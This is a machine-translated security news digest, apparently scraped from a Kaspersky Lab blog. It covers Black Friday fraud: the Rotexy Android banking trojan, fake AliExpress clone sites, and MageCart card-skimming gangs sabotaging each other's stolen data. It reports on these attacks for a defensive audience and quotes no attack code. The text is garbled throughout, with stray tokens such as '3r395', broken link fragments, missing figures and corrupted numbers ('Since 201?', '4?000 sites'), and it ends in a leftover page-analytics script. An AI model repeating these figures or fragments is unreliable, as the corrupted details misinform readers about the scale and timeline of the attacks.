The world holiday of consumption under the name “Black Friday”, fortunately, has ended. It remains to find out whether you saved money or still lost. And this question is related not only to the usefulness and usefulness of the purchased goods. Sometimes, instead of buying, there is a leak of credit card or a payment system account, and then a direct theft of money as a result of cybercriminals. The phenomenon of massive sales is of interest to those who protect payments online, so last week there was also enough research on security. Let's look at the most interesting.
 3r395.
 3r395. In today's release: attacks on users with the help of malware on personal computers and on mobile phones. Attacks on online stores with the subsequent theft of credit card data. And just fake websites that do not sell anything, but accept money from the public. And we will start with the Rotexy Android Trojan investigated by Kaspersky Lab.
 3r395. 3r311.
 3r395. Rotexy (a brief overview in 3r315. Of this 3r3-378. News, full 3r3177. Study
) Is a malware program for Android-based devices that was first detected in 2014. A feature of this family of Trojans was the use of three channels at once to communicate with the command server: via SMS, directly via the Internet or using the Google Cloud Messaging service. Trojan spreads via SMS with a link to an infected APK under the name AvitoPay.apk or similar. If you have ever placed an advertisement for the sale and received a strange SMS with the link “I am ready to pay, click here”, here it was (or something like that, there are many such programs). After installing and requesting administrator rights, Rotexy sends an IMEI device to the command server. In response, a set of rules arrives that allow processing, for example, SMS from online banking. These rules look like this:
 3r395.
 3r395.

 3r395. The most modern version of the malicious program, after requesting administrator rights, shows a stub - the application was allegedly unable to install. In fact, the program hides its icon from the list of installed applications. If the user rejects the request for administration rights, the application flashes the screen. After installation, when you try to stop the application, the phone is forced to restart. Depending on the command sent by the managing server, the Trojan can send itself to all contacts in the phone, update itself, transfer to the attackers a list of contacts and messages, pretend that the user has received an SMS, display a phishing page or page of an allegedly blocked smartphone and then extort money . If the user enters these cards, the trojan can compare the last four digits with the information from the banking SMS and “recommend” enter the correct number.
 3r395.
 3r395.
 3r395. More Trojans for computers and mobile phones are described in the Kaspersky Lab report for Black Friday (3-33346. Short 3-3378. Russian version, 3-3348. Full 3-3378. In English). The study provides an approximate breakdown by areas of interest of cybercriminals: in half of the cases, the payment information of victims is intercepted during purchases in online retailers (independent stores selling clothes and jewelry, for example, but not electronics). Online platforms such as eBay or Alibaba are “controlled” by malware much less frequently. Perhaps because the value for them is no longer credit card numbers, but user accounts. On the black market, PayPal accounts are most often offered, but Amazon and eBay accounts are often found.
 3r395.
 3r395. Another way to dishonestly take money from the public is to create and promote fake websites that mimic popular online platforms. A study by Group-IB (3r3-354. News 3r3-378.) Reported the discovery of at least 400 clones from the AliExpress site alone. Last year's “Friday” study by Kaspersky Lab 3–3–356. showed r3r378. a significant increase in the share of purchases from mobile devices, where determining that you have a fake website, is even more difficult than when viewing the desktop version. Finally, in order to steal payment details, it is not necessary to attack the end users. Since 201? information security researchers have been monitoring the activities of the MageCart group, which got its name from attacks against CMS Magento. For example, from their hands this summer, hurt Ticketmaster's largest ticket service.
 3r395.
 3r395. According to researcher Willem de Groot, competition began between the participants of the grouping (or individual gangs) in November (3–3–364. News 3–3–378., 3–3–366. Post 3–3–378. In the researcher’s blog). On one of the sites, several malicious scripts were detected at once, sending data on credit card numbers to hackers. One of the scripts (more advanced) not only collected credit card numbers - it also interfered with the work of competitors: the card numbers were sent to their server, in which one digit was replaced with the help of such a simple randomizer.
 3r395.
 3r395.
 3r395. Thus, one criminal group also spoils the reputation of another. By 3r377. data 3r378. the same expert, over the past three months, malicious code, one way or another related to the MageCart campaign, was discovered on more than five thousand sites. Over three years, 4?000 sites have been infected. One online store attacked 18 times in a row. On another, the attackers left a message to the administrators: say, stop deleting the scripts.
 3r395.
 3r395. Recommendations to prevent theft of funds from credit cards and theft of accounts of payment systems, despite the development of methods of attack, remain the same. Protecting devices from malware, using individual cards with a limited budget for online payments, using two-factor authentication for both accounts and payments. Well, returning to the story about the Android Trojan, you should not click on the links, even if they seem to be sent by a familiar person.
 3r395.
 3r395. [i] Disclaimer: The opinions expressed in this digest may not always coincide with the official position of Kaspersky Lab. Dear editors generally recommend to treat any opinions with a healthy skepticism. 3r388.
3r395. 3r395. 3r395. 3r33939. ! function (e) {function t (t, n) {if (! (n in e)) {for (var r, a = e.document, i = a.scripts, o = i.length; o-- ;) if (-1! == i[o].src.indexOf (t)) {r = i[o]; break} if (! r) {r = a.createElement ("script"), r.type = "text /jаvascript", r.async =! ? r.defer =! ? r.src = t, r.charset = "UTF-8"; var d = function () {var e = a.getElementsByTagName ("script")[0]; e.parentNode.insertBefore (r, e)}; "[object Opera]" == e.opera? a.addEventListener? a.addEventListener ("DOMContentLoaded", d,! 1): e.attachEvent ("onload", d ): d ()}}} t ("//mediator.mail.ru/script/2820404/"""_mediator") () (); 3r3394. 3r395.